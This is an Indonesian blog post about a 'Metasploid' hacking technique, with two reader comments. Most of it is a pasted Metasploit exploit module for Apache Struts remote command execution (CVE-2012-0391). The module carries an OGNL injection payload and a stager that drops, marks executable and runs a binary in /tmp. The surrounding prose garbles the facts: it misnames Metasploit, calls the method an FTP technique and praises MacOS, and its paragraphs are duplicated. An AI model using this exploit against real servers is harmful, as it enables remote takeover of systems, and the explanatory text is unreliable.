Hacking Teknik
Metasploid Oleh Hacker-Hacker Veteran Injeksi Remote Access Computer Command
Salam blogger Indonesia…
Kami tidak berbagi cara untuk melakukan hacking ini,
Namun kami akan berbagi alur dari proses hacking tersebut.
Yeaa… kebanyakan hacker selalu melakukan aksinya jika terlihat celah-celah yang memungkinkan mereka dapat menerobos keamanan dari setiap system yang mereka targetkan.
Begitu pulsa dengan cara Metasploid.
Teknik ini memanfaatkan sebuah koneksi FTP (File Tranfer Protocol) yang memungkinkan hacker untuk dapat mencuri file taget melalui protocol yang mereka jebol, dalam proses ini CMD (Command) sangat diberlakukan dan melakukannya melewati lajur HTTP Client.
Mungkin para hacker yang menggunakan cara ini banyak yang memakai OS (Operation System) Linux, adapun beberapa hacker kawakan yang menggunakan Windows, tapi dalam proses ini pendukung yang sangat kuat dari OS sebenarnya adalah MacOS, karena dalam MacOS FTP yang tampil lebih banyak dari setiap fitur-fitur hacking tersebut memungkinkan para hacker dapat melihat lajur atau kondisi Koneksinya.
Cobalah perhatikan proses lajut Metasploid dibawah :
##
Kami tidak berbagi cara untuk melakukan hacking ini,
Namun kami akan berbagi alur dari proses hacking tersebut.
Yeaa… kebanyakan hacker selalu melakukan aksinya jika terlihat celah-celah yang memungkinkan mereka dapat menerobos keamanan dari setiap system yang mereka targetkan.
Begitu pulsa dengan cara Metasploid.
Teknik ini memanfaatkan sebuah koneksi FTP (File Tranfer Protocol) yang memungkinkan hacker untuk dapat mencuri file taget melalui protocol yang mereka jebol, dalam proses ini CMD (Command) sangat diberlakukan dan melakukannya melewati lajur HTTP Client.
Mungkin para hacker yang menggunakan cara ini banyak yang memakai OS (Operation System) Linux, adapun beberapa hacker kawakan yang menggunakan Windows, tapi dalam proses ini pendukung yang sangat kuat dari OS sebenarnya adalah MacOS, karena dalam MacOS FTP yang tampil lebih banyak dari setiap fitur-fitur hacking tersebut memungkinkan para hacker dapat melihat lajur atau kondisi Koneksinya.
Cobalah perhatikan proses lajut Metasploid dibawah :
##
# This file is part of the Metasploit
Framework and may be subject to
# redistribution and commercial
restrictions. Please see the Metasploit
# web site for more information on
licensing and terms of use.
#
http://metasploit.com/
##
require 'msf/core'
class Metasploit3 <
Msf::Exploit::Remote
Rank
= ExcellentRanking
include
Msf::Exploit::CmdStagerTFTP
include
Msf::Exploit::Remote::HttpClient
def
initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts <= 2.2.1.1
Remote Command Execution',
'Description' => %q{
This
module exploits a remote command execution vulnerability in
Apache
Struts versions < 2.2.1.1. This issue is caused because the
ExceptionDelegator
interprets parameter values as OGNL expressions
during
certain exception handling for mismatched data types of properties,
which
allows remote attackers to execute arbitrary Java code via a
crafted
parameter.
},
'Author' =>
[
'Johannes
Dahse', # Vulnerability discovery and PoC
'Andreas
Nusser', # Vulnerability discovery and PoC
'juan
vazquez', # Metasploit module
'sinn3r'
# Metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[
'CVE', '2012-0391'],
[
'OSVDB', '78277'],
[
'EDB', '18329'],
[
'URL',
'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
],
'Platform' => [ 'win', 'linux'],
'Privileged' => true,
'Targets' =>
[
['Windows
Universal',
{
'Arch'
=> ARCH_X86,
'Platform'
=> 'win'
}
],
['Linux
Universal',
{
'Arch'
=> ARCH_X86,
'Platform'
=> 'linux'
}
],
],
'DisclosureDate'
=> 'Jan 06 2012',
'DefaultTarget'
=> 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI',
[ true, 'The path to a struts application action and the parameter to inject
ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
OptString.new('CMD',
[ false, 'Execute this command instead of using command stager', ""
])
],
self.class)
end
def
execute_command(cmd, opts = {})
uri
= String.new(datastore['TARGETURI'])
uri.gsub!(/INJECT/,
"'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'")
if target['Platform'] == 'win'
uri.gsub!(/INJECT/,
"'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'")
if target['Platform'] == 'linux'
uri.gsub!(/CMD/,
Rex::Text::uri_encode(cmd))
vprint_status("Attempting
to execute: #{cmd}")
resp
= send_request_raw({
'uri' => uri,
'version'
=> '1.1',
'method' => 'GET',
},
5)
end
def
windows_stager
exe_fname
= rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending
request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({
:temp => '.'})
@payload_exe
= payload_exe
print_status("Attempting
to execute the payload...")
execute_command(@payload_exe)
end
def
linux_stager
cmds
= "/bin/sh@-c@echo LINE | tee FILE"
exe
= Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
base64
= Rex::Text.encode_base64(exe)
base64.gsub!(/\=/,
"\\u003d")
file
= rand_text_alphanumeric(4+rand(4))
execute_command("/bin/sh@-c@touch
/tmp/#{file}.b64")
cmds.gsub!(/FILE/,
"/tmp/" + file + ".b64")
base64.each_line
do |line|
line.chomp!
cmd
= cmds
cmd.gsub!(/LINE/,
line)
execute_command(cmds)
end
execute_command("/bin/sh@-c@base64
-d /tmp/#{file}.b64|tee /tmp/#{file}")
execute_command("/bin/sh@-c@chmod
+x /tmp/#{file}")
execute_command("/bin/sh@-c@rm
/tmp/#{file}.b64")
execute_command("/bin/sh@-c@/tmp/#{file}")
@payload_exe
= "/tmp/" + file
end
def
on_new_session(client)
if
target['Platform'] == 'linux'
print_status("Deleting
#{@payload_exe} payload file")
execute_command("/bin/sh@-c@rm
#{@payload_exe}")
else
print_status("Windows
does not allow running executables to be deleted")
print_status("Delete
the #{@payload_exe} file manually after migrating")
end
end
def
exploit
if
not datastore['CMD'].empty?
print_status("Executing
user supplied command")
execute_command(datastore['CMD'])
return
end
case
target['Platform']
when
'linux'
linux_stager
when
'win'
windows_stager
else
raise
RuntimeError, 'Unsupported target platform!'
end
handler
end
end
Dari Scipt diatas menunjukkan bahwa semua lajut hacking melalui CMD, dan itu semua tergantung pada seorang hacker yang melakukan Teknik Metasploid tersebut.
Sehingga target dan tujuan dari pengambilan data atau file dapat dengan mudah di Remote atau decontrol oleh hacker tersebut.
Hanya itu penjelasan tentang teknik Metasploid dari kami.
Semoga bermanfaat, dan dapat menambah pengetahuan sobat…
Salam Rafi Orilya Groups…
Baca juga artikel dibawah :
Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)
Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin
Dari Scipt diatas menunjukkan bahwa semua lajut hacking melalui CMD, dan itu semua tergantung pada seorang hacker yang melakukan Teknik Metasploid tersebut.
Sehingga target dan tujuan dari pengambilan data atau file dapat dengan mudah di Remote atau decontrol oleh hacker tersebut.
Hanya itu penjelasan tentang teknik Metasploid dari kami.
Semoga bermanfaat, dan dapat menambah pengetahuan sobat…
Salam Rafi Orilya Groups…
Baca juga artikel dibawah :
Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)
Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin
Wah ijin nyoba bang hehe
BalasHapusWow .. itu pake cmd ya mas ??
BalasHapus